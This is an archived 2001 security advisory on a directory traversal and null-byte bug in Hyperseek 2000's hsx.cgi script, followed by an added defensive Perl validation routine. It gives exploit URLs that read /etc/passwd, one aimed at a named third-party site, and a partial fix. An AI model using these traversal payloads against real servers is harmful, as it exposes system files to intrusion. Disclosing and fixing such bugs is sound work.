From: MC GaN (vipersvMAIL.RU)
Date: Sun Jan 28 2001 - 01:28:52 CST

                  --== NerF security gr0up advisory ==--
    --------------------------------------------------------------------
    Hyperseek 2000 Search Engine - "show directory & files" bug.
    --------------------------------------------------------------------

    1. A standard Perl problem exists in the statistics module (file: hsx.cgi): the script does not filter ../ and %00. Through this bug, you can remotely read any file and list directories. ../ means one directory up; %00 is the hex-encoded null byte, which marks the end of the string.

    2. Exploit URL:
    http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
    Note: the directory can differ and the number of ../ can vary.

    3. Example:
    http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

    4. Fix: filter such symbols, for example:
    $dat =~ s/\0//g;

    --------------------------------------------------------------------
    NerF security gr0up (Russia) - www.nerf.f2s.com
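
The substitution in item 4 removes null bytes only. As an added example (not code from the advisory or from Hyperseek), the Perl routine below checks a `show` value for both ../ and %00 and rejects it instead of rewriting it. The helper name `safe_path`, the file-name allowlist and the temporary data directory are assumptions for illustration; how hsx.cgi itself uses the parameter is not shown in the advisory.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the resolved path for $name inside $base, or undef if it must be rejected.
# safe_path is a hypothetical helper, not part of hsx.cgi.
sub safe_path {
    my ($base, $name) = @_;
    return undef unless defined $name && length $name;
    # Reject instead of stripping: removing characters can leave another
    # traversal string behind, and a rejected request is easy to log.
    return undef if $name =~ /\0/;       # decoded %00
    return undef if $name =~ /\.\./;     # parent-directory reference
    # Allowlist for a plain file name: no "/" or "\" can get through.
    return undef unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;

    my $real_base = realpath($base);
    return undef unless defined $real_base;
    my $path = File::Spec->catfile($real_base, $name);
    return undef unless -f $path;        # must be an existing regular file
    my $real = realpath($path);          # resolves symlinks
    return undef unless defined $real && index($real, "$real_base/") == 0;
    return $real;
}

# Constructed demo: a temporary directory stands in for the script's data directory.
my $base = tempdir(CLEANUP => 1);
open(my $fh, '>', File::Spec->catfile($base, 'summary.html')) or die "open: $!";
print {$fh} "ok\n";
close($fh);

# Constructed sample values of "show", as they look after URL decoding.
my @samples = ("summary.html", "../../../../../../etc/passwd\0",
               "summary.html\0.txt", "..", "sub/summary.html", "missing.html");
for my $in (@samples) {
    my $ok = defined safe_path($base, $in);
    (my $shown = $in) =~ s/\0/%00/g;     # make the null byte visible in output
    printf "%-40s %s\n", $shown, $ok ? "accepted" : "rejected";
}
```

Only `summary.html` is accepted; the other constructed values fail the null-byte, `..`, allowlist or existence check.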